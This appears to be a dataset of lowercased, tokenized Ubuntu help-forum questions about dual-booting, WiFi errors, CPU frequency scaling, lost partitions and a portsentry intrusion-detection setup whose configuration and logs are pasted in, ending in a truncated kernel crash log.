464757	ca n't install dual boot with windows 7	i know this is a duplicate , sorry , i have looked through all the questions and answers , as well as other sources on the web , tried to follow what was suggested , but still i am unable to install ubuntu on my laptop which currently runs windows 7 . first i thought the problem was that there are 4 windows partitions already , which , as i learned is the maximum . here is how my partitions looked when i tried to install first : ( sorry i was just warned that i can not insert images , so i have to describe : there were 3 partitions on disk 0 : ( 1 ) active recovery partition 1.46 gb 100 % free ( 2 ) primary partition 10.07 gb 100 % free ( 3 ) boot , page file , primary partition 446.22 gb 37 % free and 1 partition on disk 1 : ( 4 ) hibernation partition 11.21 gb 100 % free after a lot of hesitation i deleted the 11.21 gb hibernation partition , as it was 100 % free . the action was successful , it became unallocated space , - but it remained a separate entity on disk 1 . i have tried to delete disk 1 but neither the disk management utility , nor the diskpart program let me do it . i tried to install ubuntu again , - still without success . i went to the `` try ubuntu '' option ( from a bootable usb stick as my laptop has no cd/dvd drive ) , and used the gparted program to shrink the 446.22 gb windows partition , and created another 60 gb unallocated space beside it . but when i try to install ubuntu , the installation type dialog does not offer any options , and the window which should show the partitions to allocate space for the installation is empty . there are 3 buttons underneath : +/-/change ... but if i try to click any of those , the screen goes blank , and i have to restart the computer . the `` device for boot loader installation '' entry box shows : /dev/sda and there is nothing else to be selected . so at this point i have to quit the installation because i do n't want to overwrite my windows installation . what am i doing wrong ? can i install ubuntu alongside windows , and if yes , how ? please help . thank you peter
464758	how to make portsentry working under ubuntu 14.04 desktop ?	i have installed portsentry , configured the config file as : # portsentry configuration # # $ id : portsentry.conf.debian , v 1.6 2001/07/19 21:02:20 agx exp $ # # original portsentry.conf by craig h. rowland < crowland @ psionic.com > # modified for debian by guido guenther < agx @ debian.org > # # important note : you can not put spaces between your port arguments . # # the default ports will catch a large number of common probes # # all entries must be in quotes . # # # # # # # # # # # # # # # # # # # # # # # # port configurations # # # # # # # # # # # # # # # # # # # # # # # # # # # some example port configs for classic and basic stealth modes # # i like to always keep some ports at the `` low '' end of the spectrum . # this will detect a sequential port sweep really quickly and usually # these ports are not in use ( i.e . tcpmux port 1 ) # # ** x-windows users ** : if you are running x on your box , you need to be sure # you are not binding portsentry to port 6000 ( or port 2000 for openwindows users ) . # doing so will prevent the x-client from starting properly . # # these port bindings are *ignored* for advanced stealth scan detection mode . # # un-comment these if you are really anal : tcp_ports= '' 1,7,9,11,15,70,79,80,109,110,111,119,138,139,143,512,513,514,515,540,635,1080,1524,2000,2001,4000,4001,5742,6000,6001,6667,12345,12346,20034,27665,30303,32771,32772,32773,32774,31337,40421,40425,49724,54320 '' udp_ports= '' 1,7,9,66,67,68,69,111,137,138,161,162,474,513,517,518,635,640,641,666,700,2049,31335,27444,34555,32770,32771,32772,32773,32774,31337,54321 '' # # use these if you just want to be aware : # tcp_ports= '' 1,11,15,79,111,119,143,540,635,1080,1524,2000,5742,6667,12345,12346,20034,27665,31337,32771,32772,32773,32774,40421,49724,54320 '' # udp_ports= '' 1,7,9,69,161,162,513,635,640,641,700,37444,34555,31335,32770,32771,32772,32773,32774,31337,54321 '' # # use these for just bare-bones # tcp_ports= '' 1,11,15,110,111,143,540,635,1080,1524,2000,12345,12346,20034,32771,32772,32773,32774,49724,54320 '' # udp_ports= '' 1,7,9,69,161,162,513,640,700,32770,32771,32772,32773,32774,31337,54321 '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # advanced stealth scan detection options # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # this is the number of ports you want portsentry to monitor in advanced mode . # any port *below* this number will be monitored . right now it watches # everything below 1024 . # # on many linux systems you can not bind above port 61000 . this is because # these ports are used as part of ip masquerading . i do n't recommend you # bind over this number of ports . realistically : i do n't recommend you monitor # over 1024 ports as your false alarm rate will almost certainly rise . you 've been # warned ! do n't write me if you have have a problem because i 'll only tell # you to rtfm and do n't run above the first 1024 ports . # # advanced_ports_tcp= '' 1024 '' advanced_ports_udp= '' 1024 '' # # this field tells portsentry what ports ( besides listening daemons ) to # ignore . this is helpful for services like ident that services such # as ftp , smtp , and wrappers look for but you may not run ( and probably # *shouldn't* imho ) . # # by specifying ports here portsentry will simply not respond to # incoming requests , in effect portsentry treats them as if they are # actual bound daemons . the default ports are ones reported as # problematic false alarms and should probably be left alone for # all but the most isolated systems/networks . # # default tcp ident and netbios service advanced_exclude_tcp= '' 113,139 '' # default udp route ( rip ) , netbios , bootp broadcasts . advanced_exclude_udp= '' 520,138,137,67 '' # # # # # # # # # # # # # # # # # # # # # # # configuration files # # # # # # # # # # # # # # # # # # # # # # # # # hosts to ignore ignore_file= '' /etc/portsentry/portsentry.ignore '' # hosts that have been denied ( running history ) history_file= '' /var/lib/portsentry/portsentry.history '' # hosts that have been denied this session only ( temporary until next restart ) blocked_file= '' /var/lib/portsentry/portsentry.blocked '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # misc . configuration options # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # dns name resolution - setting this to `` 1 '' will turn on dns lookups # for attacking hosts . setting it to `` 0 '' ( or any other value ) will shut # it off . resolve_host = `` 0 '' # # # # # # # # # # # # # # # # # # # # response options # # # # # # # # # # # # # # # # # # # # # options to dispose of attacker . each is an action that will # be run if an attack is detected . if you do n't want a particular # option then comment it out and it will be skipped . # # the variable $ target $ will be substituted with the target attacking # host when an attack is detected . the variable $ port $ will be substituted # with the port that was scanned . # # # # # # # # # # # # # # # # # # # # ignore options # # # # # # # # # # # # # # # # # # # # these options allow you to enable automatic response # options for udp/tcp . this is useful if you just want # warnings for connections , but do n't want to react for # a particular protocol ( i.e . you want to block tcp , but # not udp ) . to prevent a possible denial of service attack # against udp and stealth scan detection for tcp , you may # want to disable blocking , but leave the warning enabled . # i personally would wait for this to become a problem before # doing though as most attackers really are n't doing this . # the third option allows you to run just the external command # in case of a scan to have a pager script or such execute # but not drop the route . this may be useful for some admins # who want to block tcp , but only want pager/e-mail warnings # on udp , etc . # # # 0 = do not block udp/tcp scans . # 1 = block udp/tcp scans . # 2 = run external command only ( kill_run_cmd ) block_udp= '' 1 '' block_tcp= '' 1 '' # # # # # # # # # # # # # # # # # # # # dropping routes : # # # # # # # # # # # # # # # # # # # # # this command is used to drop the route or add the host into # a local filter table . # # the gateway ( 333.444.555.666 ) should ideally be a dead host on # the *local* subnet . on some hosts you can also point this at # localhost ( 127.0.0.1 ) and get the same effect . note that # 333.444.555.66 will *not* work . you need to change it ! ! # # all kill route options are commented out initially . make sure you # uncomment the correct line for your os . if you os is not listed # here and you have a route drop command that works then please # mail it to me so i can include it . only one kill_route option # can be used at a time so do n't uncomment multiple lines . # # note : the route commands are the least optimal way of blocking # and do not provide complete protection against udp attacks and # will still generate alarms for both udp and stealth scans . i # always recommend you use a packet filter because they are made # for this purpose . # # generic kill_route= '' /sbin/route add $ target $ reject '' # generic linux # kill_route= '' /sbin/route add -host $ target $ gw 333.444.555.666 '' # newer versions of linux support the reject flag now . this # is cleaner than the above option . # kill_route= '' /sbin/route add -host $ target $ reject '' # generic bsd ( bsdi , openbsd , netbsd , freebsd ) # kill_route= '' /sbin/route add $ target $ 333.444.555.666 '' # generic sun # kill_route= '' /usr/sbin/route add $ target $ 333.444.555.666 1 '' # nextstep # kill_route= '' /usr/etc/route add $ target $ 127.0.0.1 1 '' # freebsd # kill_route= '' route add -net $ target $ -netmask 255.255.255.255 127.0.0.1 -blackhole '' # digital unix 4.0d ( osf/1 / compaq tru64 unix ) # kill_route= '' /sbin/route add -host -blackhole $ target $ 127.0.0.1 '' # generic hp-ux # kill_route= '' /usr/sbin/route add net $ target $ netmask 255.255.255.0 127.0.0.1 '' # # # using a packet filter is the preferred . the below lines # work well on many os 's . remember , you can only uncomment *one* # kill_route option . # # # ipfwadm support for linux # kill_route= '' /sbin/ipfwadm -i -i deny -s $ target $ -o '' # # ipfwadm support for linux ( no logging of denied packets ) # kill_route= '' /sbin/ipfwadm -i -i deny -s $ target $ '' # # ipchain support for linux # kill_route= '' /sbin/ipchains -i input -s $ target $ -j deny -l '' # # ipchain support for linux ( no logging of denied packets ) # kill_route= '' /sbin/ipchains -i input -s $ target $ -j deny '' # # iptables support for linux # kill_route= '' /sbin/iptables -i input -s $ target $ -j drop '' # # iptables support for linux with limit and log support . logs only # a limited number of packets to avoid a denial of service attack . kill_route= '' /sbin/iptables -i input -s $ target $ -j drop & & /sbin/iptables -i input -s $ target $ -m limit -- limit 3/minute -- limit-burst 5 -j log -- log-level debug -- log-prefix 'portsentry : dropping : ' '' # # for those of you running freebsd ( and compatible ) you can # use their built in firewalling as well . # # kill_route= '' /sbin/ipfw add 1 deny all from $ target $ :255.255.255.255 to any '' # # # for those running ipfilt ( openbsd , etc . ) # note that you need to change external_interface to a valid interface ! ! # # kill_route= '' /bin/echo 'block in log on external_interface from $ target $ /32 to any ' | /sbin/ipf -f - '' # # # # # # # # # # # # # # # # tcp wrappers # # # # # # # # # # # # # # # # # this text will be dropped into the hosts.deny file for wrappers # to use . there are two formats for tcp wrappers : # # format one : old style - the default when extended host processing # options are not enabled . # # kill_hosts_deny= '' all : $ target $ '' # format two : new style - the format used when extended option # processing is enabled . you can drop in extended processing # options , but be sure you escape all ' % ' symbols with a backslash # to prevent problems writing out ( i.e . \ % c \ % h ) # kill_hosts_deny= '' all : $ target $ : deny '' # # # # # # # # # # # # # # # # # # # # external command # # # # # # # # # # # # # # # # # # # # # this is a command that is run when a host connects , it can be whatever # you want it to be ( pager , etc. ) . this command is executed before the # route is dropped or after depending on the kill_run_cmd_first option below # # # i never recommend you put in retaliatory actions against the host scanning # you ! # # tcp/ip is an *unauthenticated protocol* and people can make scans appear out # of thin air . the only time it is reasonably safe ( and i *never* think it is # reasonable ) to run reverse probe scripts is when using the `` classic '' -tcp mode . # this mode requires a full connect and is very hard to spoof . # # the kill_run_cmd_first value should be set to `` 1 '' to force the command # to run *before* the blocking occurs and should be set to `` 0 '' to make the # command run *after* the blocking has occurred . # # kill_run_cmd_first = `` 0 '' # # # kill_run_cmd= '' /some/path/here/script $ target $ $ port $ $ mode $ '' # for examples see /usr/share/doc/portsentry/examples/ # # # # # # # # # # # # # # # # # # # # # # scan trigger value # # # # # # # # # # # # # # # # # # # # # # # enter in the number of port connects you will allow before an # alarm is given . the default is 0 which will react immediately . # a value of 1 or 2 will reduce false alarms . anything higher is # probably not necessary . this value must always be specified , but # generally can be left at 0 . # # note : if you are using the advanced detection option you need to # be careful that you do n't make a hair trigger situation . because # advanced mode will react for *any* host connecting to a non-used # port below your specified range , you have the opportunity to # really break things . ( i.e someone innocently tries to connect to # you via ssl [ tcp port 443 ] and you immediately block them ) . some # of you may even want this though . just be careful . # scan_trigger= '' 0 '' # # # # # # # # # # # # # # # # # # # # # # # port banner section # # # # # # # # # # # # # # # # # # # # # # # # # enter text in here you want displayed to a person tripping the portsentry . # i *don't* recommend taunting the person as this will aggravate them . # leave this commented out to disable the feature # # stealth scan detection modes do n't use this feature # # port_banner= '' ** unauthorized access prohibited *** your connection attempt has been logged . go away . '' # eof and then , when i look at log file : $ cat /var/log/syslog | grep portsentry i get : portsentry [ 7156 ] : adminalert : portsentry is shutting down portsentry [ 7212 ] : adminalert : portsentry 1.2 is starting . portsentry [ 7213 ] : adminalert : advanced mode will monitor first 1024 ports portsentry [ 7213 ] : adminalert : advanced mode will manually exclude port : 113 portsentry [ 7213 ] : adminalert : advanced mode will manually exclude port : 139 portsentry [ 7213 ] : adminalert : advanced stealth scan detection mode activated . ignored tcp port : 25 portsentry [ 7213 ] : adminalert : advanced stealth scan detection mode activated . ignored tcp port : 53 portsentry [ 7213 ] : adminalert : advanced stealth scan detection mode activated . ignored tcp port : 631 portsentry [ 7213 ] : adminalert : advanced stealth scan detection mode activated . ignored tcp port : 902 portsentry [ 7213 ] : adminalert : advanced stealth scan detection mode activated . ignored tcp port : 113 portsentry [ 7213 ] : adminalert : advanced stealth scan detection mode activated . ignored tcp port : 139 portsentry [ 7213 ] : adminalert : portsentry is now active and listening . portsentry [ 7216 ] : adminalert : portsentry 1.2 is starting . portsentry [ 7217 ] : adminalert : advanced mode will monitor first 1024 ports portsentry [ 7217 ] : adminalert : advanced mode will manually exclude port : 520 portsentry [ 7217 ] : adminalert : advanced mode will manually exclude port : 138 portsentry [ 7217 ] : adminalert : advanced mode will manually exclude port : 137 portsentry [ 7217 ] : adminalert : advanced mode will manually exclude port : 67 portsentry [ 7217 ] : adminalert : advanced stealth scan detection mode activated . ignored udp port : 53 portsentry [ 7217 ] : adminalert : advanced stealth scan detection mode activated . ignored udp port : 631 portsentry [ 7217 ] : adminalert : advanced stealth scan detection mode activated . ignored udp port : 520 portsentry [ 7217 ] : adminalert : advanced stealth scan detection mode activated . ignored udp port : 138 portsentry [ 7217 ] : adminalert : advanced stealth scan detection mode activated . ignored udp port : 137 portsentry [ 7217 ] : adminalert : advanced stealth scan detection mode activated . ignored udp port : 67 portsentry [ 7217 ] : adminalert : portsentry is now active and listening . i did scan from many hosts using nmap and ping , nothing at all in the log file . so what is the deal ? did i do something wrong or am i just missing something ? thanks .
464761	ubuntu server sd on hp microserver g8 g1610t	i 've recently purchased a hp microserver g8 g16010t with the intel celeron processor . have installed 2 x 2tb seagate nas drives and 4gb ram . i 'm primarily looking to get a lamp setup going . would really appreciate responses to these questions as i 'm feeling my way here : hp list as a certified os : ubuntu server 12.04 , and point to http : //old-releases.ubuntu.com/releases/precise/ubuntu-12.04.2-server-amd64.iso - just want to be sure though that this is the correct version for the g1610t ( i.e . not just the g2020 ) ? i 've read many of the hp forum entries on the fan noise on the hp ms g8 - and appear to be linked to either ilo or the b120i smart array controller - but understand that these features are n't supported by ubunutu server ? is that correct or are their successful work-arounds ? i want to run ubuntu server on a microsd - booting a sandisk 32gb extreme sd card in the internal sd slot ( i.e . not one of the hard drives ) - has anybody had any experience setting this up and any hints/tips ( or detailed instructions : ) ) ? thanks in advance .
464762	`` internal error '' when connecting to wifi - ubuntu 13.10	i just installed ubuntu 13.10 on a toshiba satellite c850 laptop , ethernet works fine but i ca n't connect via wifi , i get an `` internal error '' message ; what could be wrong ? and how can i fix this ? thanks in advance !
464765	i do n't find any of my partitions after reinstalling ubuntu . what to do ?	i had dual-boot pc with window 8 and ubuntu . in windows , i messed up the mbr and boot files and my pc did not boot . i had a copy of ubuntu 14 dvd and so reinstalled it . now in ubuntu , i do n't find any of my partitions ( drives ) here . does it mean ubuntu has formatted the whole pc hard disk and reinstalled ubuntu ? i fear my whole data has been lost . please help me urgent thanks
464767	on trusty : there are 19 packages shown as 'not to upgrade '	on a clean install of trusty , there are ( shown by sudo apt-get autoremove ) as 'not to upgrade ' . why is this , how can i found out what they are ( either by synaptic or cli ) and should i do something about it ?
464768	can not load acpi_cpufreq module	i have been trying hard recently to scale my cpu frequency from 1ghz ( the current frequency ) to 1.67 ghz ( the maximum frequency ) but it wo n't let me as when i execute sudo cpufreq-set -u 1.67ghz it outputs nothing and the frequency is still the same ( 1 ghz ) here 's the output from cpu-freqinfo cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 1000 mhz - 1.67 ghz available frequency steps : 1.67 ghz , 1.33 ghz , 1000 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1000 mhz and 1000 mhz . the governor `` ondemand '' may decide which speed to use within this range . < -- -- -- -- -- current cpu frequency is 1000 mhz . cpufreq stats : 1.67 ghz:0.00 % , 1.33 ghz:0.01 % , 1000 mhz:99.99 % ( 2 ) analyzing cpu 1 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 10.0 us . hardware limits : 1000 mhz - 1.67 ghz available frequency steps : 1.67 ghz , 1.33 ghz , 1000 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1000 mhz and 1000 mhz . the governor `` ondemand '' may decide which speed to use within this range . < -- -- -- -- -- current cpu frequency is 1000 mhz . cpufreq stats : 1.67 ghz:0.00 % , 1.33 ghz:0.01 % , 1000 mhz:99.99 % ( 1 ) i thought this might be because the driver responsible for scaling ( acpi-cpufreq ) is not loaded , so i tried loading it by modprobe acpi-cpufreq but it did n't work as it outputted nothing and when i checked the loaded modules the acpi-cpufreq module was n't there . so how can i load acpi-cpufreq module in order to be able to change my cpu frequency ? any suggestion is greatly appreciated . thanks in advance ! edit : i also did locate acpi-cpufreq to find where the module is located but it did n't output anything .
464770	nautilus crashes when connected to remote server and vpn connection is lost	since last week i 've been getting some trouble with nautilus when connecting to a remote server ( sftp : //username @ server ) . i connect to a remote server at my university via vpn , but as soon as the connection is lost i can not use nautilus anymore : it totally freezes and can not be restarted . for now my only solution is to restart my whole pc . does anyone know how to fix this problem ?
464771	no space left on device - ubuntu 12.04 server on vmware workstation	i have ubuntu 12.04 server installed and inside vmware workstation 10 and have much space left . even when i try to create a folder it says : - no space left on device i have much space allocated for my virtual machine but do not know what is going wrong . here is what someone suggested and here is output : - output of df -h is
464776	can not get past the login screen after upgading	i 've upgraded to ubuntu 12.04 . after logging in i get the following message : keith @ keith-desktop : ~ $ where do i go from here ? i have tried most commands i have found on forum pages but nothing seems to work . it keeps arriving back at the message . i 'm at a total loss and quite new to ubuntu programming ! thanks .
464778	laptop hangs and dies with following crash log .	may 11 10:48:50 gyanu-svt13135cxs kernel : [ 87.533282 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 may 11 10:48:50 gyanu-svt13135cxs kernel : [ 87.533284 ] usb 3-1 : product : qualcomm cdma technologies msm ... ... ... ... .. ... ... ... ... ... may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017497 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801fc0896c0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017504 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801fc089740 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017507 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8801fc089700 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017510 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3d40 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017512 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3d00 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017515 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3ac0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017517 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3a80 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017520 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3fc0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017522 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3f80 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017525 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3000 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.017527 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800360e3040 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018149 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018163 ] warning : cpu : 3 pid : 2437 at /home/apw/cod/linux/drivers/usb/host/xhci-ring.c:599 xhci_find_new_dequeue_state+0x15d/0x290 ( ) may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018165 ] modules linked in : zte_ev usbserial usb_storage rfcomm bnep snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_pcm intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm arc4 snd_seq_midi snd_seq_midi_event ath9k crct10dif_pclmul crc32_pclmul snd_rawmidi ath9k_common ghash_clmulni_intel ath9k_hw ath aesni_intel mac80211 aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd snd_seq microcode joydev ath3k btusb serio_raw bluetooth snd_seq_device snd_timer rtsx_pci_ms cfg80211 snd memstick lpc_ich 6lowpan_iphc soundcore sony_laptop parport_pc mei_me ppdev mei mac_hid lp parport rtsx_pci_sdmmc i915 i2c_algo_bit drm_kms_helper psmouse drm r8169 ahci rtsx_pci mii wmi video may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018232 ] cpu : 3 pid : 2437 comm : usb-storage not tainted 3.14.3-031403-generic # 201405061153 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018234 ] hardware name : sony corporation svt13135cxs/vaio , bios r1100d4 11/14/2012 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018236 ] 0000000000000257 ffff8801fc29ba78 ffffffff817633e5 0000000000000007 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018241 ] 0000000000000000 ffff8801fc29bab8 ffffffff8106ac9c ffffffff8159bc20 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018244 ] ffff8800a32a2000 ffff8801fc29bb40 ffff88022ebf8b80 00000001fc274800 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018248 ] call trace : may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018255 ] [ < ffffffff817633e5 > ] dump_stack+0x46/0x58 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018261 ] [ < ffffffff8106ac9c > ] warn_slowpath_common+0x8c/0xc0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018265 ] [ < ffffffff8159bc20 > ] ? trace_xhci_dbg_quirks+0x70/0x70 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018269 ] [ < ffffffff8106acea > ] warn_slowpath_null+0x1a/0x20 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018274 ] [ < ffffffff815a9c2d > ] xhci_find_new_dequeue_state+0x15d/0x290 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018277 ] [ < ffffffff815a0398 > ] xhci_cleanup_stalled_ring+0x78/0x100 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018281 ] [ < ffffffff815a0556 > ] xhci_endpoint_reset+0x136/0x190 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018287 ] [ < ffffffff8156df85 > ] usb_hcd_reset_endpoint+0x25/0x70 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018290 ] [ < ffffffff815711e8 > ] usb_enable_endpoint+0xa8/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018293 ] [ < ffffffff81571232 > ] usb_enable_interface+0x42/0x60 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018297 ] [ < ffffffff81567a40 > ] usb_reset_and_verify_device+0x210/0x4a0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018303 ] [ < ffffffff814b1c74 > ] ? device_release_driver+0x34/0x40 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018306 ] [ < ffffffff81567dc0 > ] usb_reset_device+0xf0/0x1d0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018313 ] [ < ffffffffa06b8f89 > ] usb_stor_port_reset+0x69/0x70 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018317 ] [ < ffffffffa06b9026 > ] usb_stor_invoke_transport+0x96/0x570 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018322 ] [ < ffffffffa06b7e5e > ] usb_stor_transparent_scsi_command+0xe/0x10 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018327 ] [ < ffffffffa06ba68a > ] usb_stor_control_thread+0x1ba/0x310 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018332 ] [ < ffffffffa06ba4d0 > ] ? fill_inquiry_response+0x20/0x20 [ usb_storage ] may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018336 ] [ < ffffffff8108ffa9 > ] kthread+0xc9/0xe0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018339 ] [ < ffffffff8108fee0 > ] ? flush_kthread_worker+0xb0/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018342 ] [ < ffffffff81779d7c > ] ret_from_fork+0x7c/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018345 ] [ < ffffffff8108fee0 > ] ? flush_kthread_worker+0xb0/0xb0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018347 ] -- - [ end trace 60d1ae0297f61c92 ] -- - may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018357 ] bug : unable to handle kernel null pointer dereference at 0000000000000010 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018402 ] ip : [ < ffffffff815a9dcc > ] xhci_queue_new_dequeue_state+0x6c/0xe0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018440 ] pgd 0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018453 ] oops : 0000 [ # 1 ] smp may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018473 ] modules linked in : zte_ev usbserial usb_storage rfcomm bnep snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_pcm intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm arc4 snd_seq_midi snd_seq_midi_event ath9k crct10dif_pclmul crc32_pclmul snd_rawmidi ath9k_common ghash_clmulni_intel ath9k_hw ath aesni_intel mac80211 aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd snd_seq microcode joydev ath3k btusb serio_raw bluetooth snd_seq_device snd_timer rtsx_pci_ms cfg80211 snd memstick lpc_ich 6lowpan_iphc soundcore sony_laptop parport_pc mei_me ppdev mei mac_hid lp parport rtsx_pci_sdmmc i915 i2c_algo_bit drm_kms_helper psmouse drm r8169 ahci rtsx_pci mii wmi video may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018882 ] cpu : 3 pid : 2437 comm : usb-storage tainted : g w 3.14.3-031403-generic # 201405061153 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018929 ] hardware name : sony corporation svt13135cxs/vaio , bios r1100d4 11/14/2012 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.018968 ] task : ffff8800a37f98f0 ti : ffff8801fc29a000 task.ti : ffff8801fc29a000 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019005 ] rip : 0010 : [ < ffffffff815a9dcc > ] [ < ffffffff815a9dcc > ] xhci_queue_new_dequeue_state+0x6c/0xe0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019054 ] rsp : 0018 : ffff8801fc29bac8 eflags : 00010046 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019081 ] rax : 0000000000000000 rbx : ffff8801fc29bb40 rcx : 0000000000000240 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019116 ] rdx : 0000000000000000 rsi : ffff8801fc102900 rdi : 0000000000000000 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019151 ] rbp : ffff8801fc29bb28 r08 : ffff8801fc29bb40 r09 : ffff8801fc102900 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019186 ] r10 : 0000000000000002 r11 : 00000000000003b3 r12 : ffff8800a32a2000 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019221 ] r13 : ffff88009c1acfe8 r14 : 0000000000000000 r15 : 0000000000000012 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019257 ] fs : 0000000000000000 ( 0000 ) gs : ffff88024f2c0000 ( 0000 ) knlgs:0000000000000000 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019297 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019325 ] cr2 : 0000000000000010 cr3 : 0000000001c0d000 cr4 : 00000000001407e0 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019361 ] stack : may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019371 ] ffff8801fc29bb38 ffff8801fc29bae8 ffffffff81addf5a ffff8801fc102900 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019412 ] ffff880100000002 00000000fc274801 ffff8800a32a2000 ffff88009c1acfe8 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019451 ] ffff8800a32a2000 ffff8800a4275000 0000000000000012 ffff8800a32a2048 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019492 ] call trace : may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019508 ] [ < ffffffff815a0419 > ] xhci_cleanup_stalled_ring+0xf9/0x100 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019542 ] [ < ffffffff815a0556 > ] xhci_endpoint_reset+0x136/0x190 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 109.019575 ] [ < ffffffff8156df85 > ] usb_hcd_reset_endpoint+0x25/0x70 may 11 10:49:12 gyanu-svt13135cxs kernel : [ 